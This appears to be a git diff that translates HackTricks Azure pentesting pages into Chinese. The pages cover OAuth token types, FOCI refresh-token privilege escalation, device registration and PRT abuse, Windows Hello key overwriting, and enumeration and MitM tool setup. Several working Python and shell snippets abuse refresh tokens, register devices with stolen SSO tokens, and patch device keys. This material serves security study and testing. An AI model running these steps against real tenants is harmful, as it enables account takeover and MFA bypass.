实现了 OAuth 2.0 授权框架和 OpenID Connect (OIDC) 认证协议,以管理对资源的访问。 ### OAuth -**Key Participants in OAuth 2.0:** +**OAuth 2.0 的关键参与者:** -1. **Resource Server (RS):** Protects resources owned by the resource owner. -2. **Resource Owner (RO):** Typically an end-user who owns the protected resources. -3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner. -4. 
**Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them. +1. **资源服务器 (RS):** 保护资源所有者拥有的资源。 +2. **资源所有者 (RO):** 通常是拥有受保护资源的最终用户。 +3. **客户端应用程序 (CA):** 代表资源所有者请求访问资源的应用程序。 +4. **授权服务器 (AS):** 在验证和授权客户端应用程序后向其发放访问令牌。 -**Scopes and Consent:** +**范围和同意:** -- **Scopes:** Granular permissions defined on the resource server that specify access levels. -- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes. +- **范围:** 在资源服务器上定义的细粒度权限,指定访问级别。 +- **同意:** 资源所有者授予客户端应用程序访问特定范围资源的权限的过程。 -**Microsoft 365 Integration:** +**Microsoft 365 集成:** -- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications. -- These applications are deeply integrated and often have interdependent service relationships. -- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications. -- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l. -- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces. +- Microsoft 365 利用 Azure AD 进行 IAM,并由多个“第一方”OAuth 应用程序组成。 +- 这些应用程序深度集成,通常具有相互依赖的服务关系。 +- 为了简化用户体验并保持功能,微软对这些第一方应用程序授予“隐含同意”或“预先同意”。 +- **隐含同意:** 某些应用程序在没有明确用户或管理员批准的情况下**自动获得对特定范围的访问权限**。 +- 这些预先同意的范围通常对用户和管理员都是隐藏的,使其在标准管理界面中不太可见。 -**Client Application Types:** +**客户端应用程序类型:** -1. **Confidential Clients:** - - Possess their own credentials (e.g., passwords or certificates). - - Can **securely authenticate themselves** to the authorization server. -2. **Public Clients:** - - Do not have unique credentials. - - Cannot securely authenticate to the authorization server. - - **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application. +1. **机密客户端:** +- 拥有自己的凭据(例如,密码或证书)。 +- 可以**安全地向授权服务器进行身份验证**。 +2. **公共客户端:** +- 没有唯一凭据。 +- 不能安全地向授权服务器进行身份验证。 +- **安全隐患:** 攻击者可以在请求令牌时冒充公共客户端应用程序,因为授权服务器没有机制来验证应用程序的合法性。 ## Authentication Tokens -There are **three types of tokens** used in OIDC: +在 OIDC 中使用**三种类型的令牌**: -- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default. -- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**. -- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens). - - A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**. 
- - A refresh token is encrypted and only Microsoft can decrypt it. - - Getting a new refresh token doesn't revoke the previous refresh token. +- [**访问令牌**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** 客户端将此令牌呈现给资源服务器以**访问资源**。它只能用于特定的用户、客户端和资源组合,并且**在到期之前无法被撤销** - 默认情况下为 1 小时。 +- **ID 令牌**:客户端从**授权服务器**接收此**令牌**。它包含有关用户的基本信息。它**绑定到特定的用户和客户端组合**。 +- **刷新令牌**:与访问令牌一起提供给客户端。用于**获取新的访问和 ID 令牌**。它绑定到特定的用户和客户端组合,并且可以被撤销。默认过期时间为**90 天**(对于不活动的刷新令牌)和**活动令牌没有过期**(可以从刷新令牌获取新的刷新令牌)。 +- 刷新令牌应与**`aud`**、某些**范围**和**租户**相关联,并且只能为该 aud、范围(且不更多)和租户生成访问令牌。然而,**FOCI 应用程序令牌**并非如此。 +- 刷新令牌是加密的,只有微软可以解密它。 +- 获取新的刷新令牌不会撤销先前的刷新令牌。 > [!WARNING] -> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**. +> **条件访问**的信息存储在**JWT**中。因此,如果您从**允许的 IP 地址**请求**令牌**,该**IP**将被**存储**在令牌中,然后您可以使用该令牌从**不允许的 IP 访问资源**。 ### Access Tokens "aud" -The field indicated in the "aud" field is the **resource server** (the application) used to perform the login. +“aud”字段中指示的字段是用于执行登录的**资源服务器**(应用程序)。 -The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token: +命令 `az account get-access-token --resource-type [...]` 支持以下类型,每种类型将在结果访问令牌中添加特定的“aud”: > [!CAUTION] -> Note that the following are just the APIs supported by `az account get-access-token` but there are more. +> 请注意,以下仅是 `az account get-access-token` 支持的 API,但还有更多。
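
For example, tokens for different audiences can be requested and their `aud`/`scp` claims checked locally; the decode step below is just a quick inspection of the unsigned JWT payload and assumes Python 3 is available:

```bash
# Request tokens for two different audiences
az account get-access-token --resource-type ms-graph
az account get-access-token --resource-type arm

# Inspect the "aud" and "scp" claims of one of them (no signature verification)
TOKEN=$(az account get-access-token --resource-type ms-graph --query accessToken -o tsv)
python3 -c 'import base64,json,sys; p=sys.argv[1].split(".")[1]; p+="="*(-len(p)%4); print(json.dumps(json.loads(base64.urlsafe_b64decode(p)), indent=2))' "$TOKEN"
```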
-aud examples +aud 示例 -- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD). - - `https://graph.windows.net/` +- **aad-graph (Azure Active Directory Graph API)**:用于访问已弃用的 Azure AD Graph API,允许应用程序读取和写入 Azure Active Directory (Azure AD) 中的目录数据。 +- `https://graph.windows.net/` -* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more. - - `https://management.core.windows.net/ or https://management.azure.com/` +* **arm (Azure Resource Manager)**:用于通过 Azure Resource Manager API 管理 Azure 资源。这包括创建、更新和删除虚拟机、存储帐户等资源的操作。 +- `https://management.core.windows.net/ 或 https://management.azure.com/` -- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud. - - `https://batch.core.windows.net/` +- **batch (Azure Batch Services)**:用于访问 Azure Batch,这是一项服务,可有效地在云中启用大规模并行和高性能计算应用程序。 +- `https://batch.core.windows.net/` -* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service. - - `https://datalake.azure.net/` +* **data-lake (Azure Data Lake Storage)**:用于与 Azure Data Lake Storage Gen1 交互,这是一项可扩展的数据存储和分析服务。 +- `https://datalake.azure.net/` -- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content. - - `https://rest.media.azure.net` +- **media (Azure Media Services)**:用于访问 Azure Media Services,提供基于云的视频和音频内容处理和交付服务。 +- `https://rest.media.azure.net` -* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services. - - `https://graph.microsoft.com` +* **ms-graph (Microsoft Graph API)**:用于访问 Microsoft Graph API,这是 Microsoft 365 服务数据的统一端点。它允许您访问 Azure AD、Office 365、企业移动性和安全服务等服务的数据和见解。 +- `https://graph.microsoft.com` -- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB. - - `https://ossrdbms-aad.database.windows.net` +- **oss-rdbms (Azure Open Source Relational Databases)**:用于访问 Azure 数据库服务,支持开源关系数据库引擎,如 MySQL、PostgreSQL 和 MariaDB。 +- `https://ossrdbms-aad.database.windows.net`
### Access Tokens Scopes "scp" -The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to. +访问令牌的范围存储在访问令牌 JWT 内的 scp 键中。这些范围定义了访问令牌可以访问的内容。 -If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT. +如果 JWT 被允许联系特定 API,但**没有范围**来执行请求的操作,则它**将无法使用该 JWT 执行该操作**。 ### Get refresh & access token example - ```python # Code example from https://github.com/secureworks/family-of-client-ids-research import msal @@ -107,17 +106,17 @@ from typing import Any, Dict, List # LOGIN VIA CODE FLOW AUTHENTICATION azure_cli_client = msal.PublicClientApplication( - "04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client +"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client ) device_flow = azure_cli_client.initiate_device_flow( - scopes=["https://graph.microsoft.com/.default"] +scopes=["https://graph.microsoft.com/.default"] ) print(device_flow["message"]) # Perform device code flow authentication azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow( - device_flow +device_flow ) pprint(azure_cli_bearer_tokens_for_graph_api) @@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api) # DECODE JWT def decode_jwt(base64_blob: str) -> Dict[str, Any]: - """Decodes base64 encoded JWT blob""" - return jwt.decode( - base64_blob, options={"verify_signature": False, "verify_aud": False} - ) +"""Decodes base64 encoded JWT blob""" +return jwt.decode( +base64_blob, options={"verify_signature": False, "verify_aud": False} +) decoded_access_token = decode_jwt( - azure_cli_bearer_tokens_for_graph_api.get("access_token") +azure_cli_bearer_tokens_for_graph_api.get("access_token") ) pprint(decoded_access_token) # GET NEW ACCESS TOKEN AND REFRESH TOKEN new_azure_cli_bearer_tokens_for_graph_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), - # Same scopes as original authorization - scopes=["https://graph.microsoft.com/.default"], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +azure_cli_bearer_tokens_for_graph_api.get("refresh_token"), +# Same scopes as original authorization +scopes=["https://graph.microsoft.com/.default"], +) ) pprint(new_azure_cli_bearer_tokens_for_graph_api) ``` - ## FOCI Tokens Privilege Escalation -Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended. +之前提到,刷新令牌应该与生成时的**范围**、**应用程序**和**租户**绑定。如果任何这些边界被打破,就有可能提升权限,因为将能够生成访问令牌以访问用户有权限的其他资源和租户,并且具有比最初预期更多的范围。 -Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. 
A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them." +此外,**这对于所有刷新令牌都是可能的**,在[Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/)(Microsoft Entra 账户、Microsoft 个人账户以及 Facebook 和 Google 等社交账户)中,因为正如[**文档**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens)所提到的:“刷新令牌绑定于用户和客户端的组合,但**不与资源或租户绑定**。客户端可以使用刷新令牌获取**在其有权限的任何资源和租户组合**中的访问令牌。刷新令牌是加密的,只有 Microsoft identity platform 可以读取它们。” -Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server. +此外,请注意 FOCI 应用程序是公共应用程序,因此**不需要秘密**来进行服务器身份验证。 -Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv). +然后在[**原始研究**](https://github.com/secureworks/family-of-client-ids-research/tree/main)中报告的已知 FOCI 客户端可以[**在这里找到**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv)。 ### Get different scope -Following with the previous example code, in this code it's requested a new token for a different scope: - +继续之前的示例代码,在此代码中请求一个不同范围的新令牌: ```python # Code from https://github.com/secureworks/family-of-client-ids-research azure_cli_bearer_tokens_for_outlook_api = ( - # Same client as original authorization - azure_cli_client.acquire_token_by_refresh_token( - new_azure_cli_bearer_tokens_for_graph_api.get( - "refresh_token" - ), - # But different scopes than original authorization - scopes=[ - "https://outlook.office.com/.default" - ], - ) +# Same client as original authorization +azure_cli_client.acquire_token_by_refresh_token( +new_azure_cli_bearer_tokens_for_graph_api.get( +"refresh_token" +), +# But different scopes than original authorization +scopes=[ +"https://outlook.office.com/.default" +], +) ) pprint(azure_cli_bearer_tokens_for_outlook_api) ``` - -### Get different client and scopes - +### 获取不同的客户端和范围 ```python # Code from https://github.com/secureworks/family-of-client-ids-research microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c") microsoft_office_bearer_tokens_for_graph_api = ( - # This is a different client application than we used in the previous examples - microsoft_office_client.acquire_token_by_refresh_token( - # But we can use the refresh token issued to our original client application - azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), - # And request different scopes too - scopes=["https://graph.microsoft.com/.default"], - ) +# This is a different client application than we used in the previous examples +microsoft_office_client.acquire_token_by_refresh_token( +# But we can use the refresh token issued to our original client application +azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"), +# And request different scopes too +scopes=["https://graph.microsoft.com/.default"], +) ) # How is this possible? 
pprint(microsoft_office_bearer_tokens_for_graph_api) ``` - -## References +## 参考文献 - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md index 5fe503c0b..8cc981a73 100644 --- a/src/pentesting-cloud/azure-security/az-device-registration.md +++ b/src/pentesting-cloud/azure-security/az-device-registration.md @@ -1,44 +1,41 @@ -# Az - Device Registration +# Az - 设备注册 {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -When a device joins AzureAD a new object is created in AzureAD. +当设备加入 AzureAD 时,会在 AzureAD 中创建一个新对象。 -When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt. +在注册设备时,**用户需要使用他的账户登录**(如有需要会要求 MFA),然后请求设备注册服务的令牌,最后询问最终确认提示。 -Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible. - -Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).: +然后,在设备中生成两个 RSA 密钥对:**设备密钥**(**公**钥)发送到 **AzureAD**,**传输**密钥(**私**钥)如果可能则存储在 TPM 中。 +接着,在 **AzureAD** 中生成 **对象**(而不是在 Intune 中),AzureAD 会向设备返回一个由其签名的 **证书**。您可以检查 **设备是否已加入 AzureAD** 以及有关 **证书** 的信息(例如是否由 TPM 保护)。 ```bash dsregcmd /status ``` +在设备注册后,**主刷新令牌**由LSASS CloudAP模块请求并提供给设备。与PRT一起交付的还有**会话密钥,只有设备可以解密**(使用传输密钥的公钥),并且**使用PRT是必需的。** -After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.** - -For more information about what is a PRT check: +有关PRT的更多信息,请查看: {{#ref}} az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md {{#endref}} -### TPM - Trusted Platform Module +### TPM - 受信任的平台模块 -The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\ -But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights. 
+**TPM** **保护**防止从关闭的设备中**提取**密钥(如果由PIN保护)以及从操作系统层提取私有材料。\ +但它**不保护**防止**嗅探**TPM与CPU之间的物理连接或**在系统运行时使用TPM中的加密材料**,这可能来自具有**SYSTEM**权限的进程。 -If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys): +如果您查看以下页面,您将看到**窃取PRT**可以用于像**用户**一样访问,这很好,因为**PRT位于设备上**,因此可以从它们中窃取(或者如果没有被窃取,则被滥用以生成新的签名密钥): {{#ref}} az-lateral-movement-cloud-on-prem/pass-the-prt.md {{#endref}} -## Registering a device with SSO tokens - -It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it: +## 使用SSO令牌注册设备 +攻击者可以从被攻陷的设备请求Microsoft设备注册服务的令牌并注册它。 ```bash # Initialize SSO flow roadrecon auth prt-init @@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie # Custom pyhton script to register a device (check roadtx) registerdevice.py ``` - -Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**. +将为您提供一个**可以用于将来请求PRT的证书**。因此,保持持久性并**绕过MFA**,因为用于注册新设备的原始PRT令牌**已经获得了MFA权限**。 > [!TIP] -> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**. +> 请注意,要执行此攻击,您需要有**注册新设备**的权限。此外,注册设备并不意味着该设备将被**允许注册到Intune**。 > [!CAUTION] -> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md). +> 此攻击在2021年9月已被修复,因为您无法再使用SSO令牌注册新设备。然而,仍然可以以合法方式注册设备(如果需要,拥有用户名、密码和MFA)。请查看:[**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md)。 -## Overwriting a device ticket +## 覆盖设备票证 -It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A). +可以**请求设备票证**,**覆盖**设备的当前票证,并在此过程中**窃取PRT**(因此无需从TPM中窃取它。有关更多信息,请[**查看此演讲**](https://youtu.be/BduCn8cLV1A)。
> [!CAUTION] -> However, this was fixed. +> 然而,这已被修复。 -## Overwrite WHFB key +## 覆盖WHFB密钥 -[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) +[**在这里查看原始幻灯片**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf) -Attack summary: +攻击摘要: -- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO -- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key -- This also provides **persistence** +- 可以通过SSO**覆盖**来自**设备**的**注册WHFB**密钥 +- 它**击败TPM保护**,因为密钥在新密钥生成期间被**嗅探** +- 这也提供了**持久性**
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
-
-Then, it's possible to generate a new key with:
+用户可以通过 Azure AD Graph 修改自己的 searchableDeviceKey 属性;不过,攻击者需要在租户中拥有一台设备(即时注册的,或从合法设备窃取了证书+密钥),以及一个有效的 AAD Graph 访问令牌。
+然后,可以使用以下命令生成新密钥:
```bash
roadtx genhellokey -d -k tempkey.key
```
-
-and then PATCH the information of the searchableDeviceKey:
+然后通过 PATCH 请求覆盖设备对象的 searchableDeviceKey 属性:
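The figure with the exact request is not included here, so the following is only a hypothetical sketch of what that PATCH against the AAD Graph could look like. The endpoint, `api-version` and the way the key JSON is built are assumptions based on the tooling referenced above; the real payload layout should be taken from the key generated by `roadtx genhellokey` and the original slides.
```bash
# Hypothetical sketch - object ID, token and payload file are placeholders you must build yourself
ACCESS_TOKEN="<AAD Graph access token>"
TENANT_ID="<tenant id>"
DEVICE_OBJECT_ID="<object id of the attacker-controlled device>"

# searchable_device_key.json is assumed to contain {"searchableDeviceKey": [ <key object derived from tempkey.key> ]}
curl -X PATCH "https://graph.windows.net/$TENANT_ID/devices/$DEVICE_OBJECT_ID?api-version=1.61-internal" \
  -H "Authorization: Bearer $ACCESS_TOKEN" \
  -H "Content-Type: application/json" \
  -d @searchable_device_key.json
```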
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check: +可以通过**设备代码钓鱼**从用户那里获取访问令牌,并利用之前的步骤**窃取他的访问权限**。有关更多信息,请查看: {{#ref}} az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md @@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
-## References +## 参考 - [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A) - [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) - [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md index 6a0dce1da..fd4244ab7 100644 --- a/src/pentesting-cloud/azure-security/az-enumeration-tools.md +++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md @@ -2,10 +2,10 @@ {{#include ../../banners/hacktricks-training.md}} -## Install PowerShell in Linux +## 在Linux中安装PowerShell > [!TIP] -> In linux you will need to install PowerShell Core: +> 在Linux中,您需要安装PowerShell Core: > > ```bash > sudo apt-get update @@ -14,11 +14,11 @@ > # Ubuntu 20.04 > wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb > -> # Update repos +> # 更新仓库 > sudo apt-get update > sudo add-apt-repository universe > -> # Install & start powershell +> # 安装并启动powershell > sudo apt-get install -y powershell > pwsh > @@ -26,58 +26,47 @@ > curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash > ``` -## Install PowerShell in MacOS +## 在MacOS中安装PowerShell -Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4): - -1. Install `brew` if not installed yet: +来自[**文档**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4)的说明: +1. 如果尚未安装,请安装`brew`: ```bash /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ``` - -2. Install the latest stable release of PowerShell: - +2. 安装最新的稳定版本的 PowerShell: ```sh brew install powershell/tap/powershell ``` - -3. Run PowerShell: - +3. 运行 PowerShell: ```sh pwsh ``` - -4. Update: - +4. 更新: ```sh brew update brew upgrade powershell ``` - -## Main Enumeration Tools +## 主要枚举工具 ### az cli -[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts. +[**Azure 命令行界面 (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) 是一个用 Python 编写的跨平台工具,用于管理和管理 (大多数) Azure 和 Entra ID 资源。它连接到 Azure 并通过命令行或脚本执行管理命令。 -Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install). 
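Once the CLI is installed, a quick way to confirm which identity, tenant and subscriptions it is currently using (useful before starting any enumeration) is for example:
```bash
az login                        # interactive login; use --use-device-code on headless systems
az account show --output table  # current tenant / subscription context
az account list --output table  # all subscriptions visible to this identity
az ad signed-in-user show       # Entra ID object of the logged-in user
```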
+请按照此链接查看 [**安装说明¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install)。 -Commands in Azure CLI are structured using a pattern of: `az ` +Azure CLI 中的命令使用以下模式结构: `az ` -#### Debug | MitM az cli - -Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: +#### 调试 | MitM az cli +使用参数 **`--debug`** 可以查看工具 **`az`** 发送的所有请求: ```bash az account management-group list --output table --debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: +为了对工具进行**MitM**并**手动检查所有请求**,您可以执行: {{#tabs }} {{#tab name="Bash" }} - ```bash export ADAL_PYTHON_SSL_NO_VERIFY=1 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 @@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080" openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem ``` - {{#endtab }} {{#tab name="PS" }} - ```bash $env:ADAL_PYTHON_SSL_NO_VERIFY=1 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 $env:HTTPS_PROXY="http://127.0.0.1:8080" $env:HTTP_PROXY="http://127.0.0.1:8080" ``` - {{#endtab }} {{#endtabs }} ### Az PowerShell -Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line. +Azure PowerShell 是一个模块,包含用于直接从 PowerShell 命令行管理 Azure 资源的 cmdlets。 -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell). +请按照此链接查看 [**安装说明**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell)。 -Commands in Azure PowerShell AZ Module are structured like: `-Az ` +Azure PowerShell AZ 模块中的命令结构如下:`-Az ` #### Debug | MitM Az PowerShell -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: - +使用参数 **`-Debug`** 可以查看工具发送的所有请求: ```bash Get-AzResourceGroup -Debug ``` - -In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy). +为了对工具进行**MitM**并**手动检查它发送的所有请求**,您可以根据[**文档**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy)设置环境变量`HTTPS_PROXY`和`HTTP_PROXY`。 ### Microsoft Graph PowerShell -Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features. +Microsoft Graph PowerShell是一个跨平台SDK,能够访问所有Microsoft Graph API,包括SharePoint、Exchange和Outlook等服务,使用单一端点。它支持PowerShell 7+、通过MSAL的现代身份验证、外部身份和高级查询。专注于最小权限访问,确保安全操作,并定期更新以与最新的Microsoft Graph API功能保持一致。 -Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation). 
+请按照此链接查看[**安装说明**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation)。 -Commands in Microsoft Graph PowerShell are structured like: `-Mg ` +Microsoft Graph PowerShell中的命令结构如下:`-Mg ` -#### Debug Microsoft Graph PowerShell - -Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending: +#### 调试Microsoft Graph PowerShell +使用参数**`-Debug`**可以查看工具发送的所有请求: ```bash Get-MgUser -Debug ``` - ### ~~**AzureAD Powershell**~~ -The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID. +Azure Active Directory (AD) 模块现在 **已弃用**,是用于管理 Azure AD 资源的 Azure PowerShell 的一部分。它提供了用于管理用户、组和 Entra ID 中的应用程序注册的 cmdlet。 > [!TIP] -> This is replaced by Microsoft Graph PowerShell - -Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD). - - - +> 这被 Microsoft Graph PowerShell 替代 +请访问此链接获取 [**安装说明**](https://www.powershellgallery.com/packages/AzureAD)。 diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md index e53ceb412..1636874bb 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md @@ -2,19 +2,18 @@ {{#include ../../../banners/hacktricks-training.md}} -### Identifying the Issues +### 识别问题 -Azure Arc allows for the 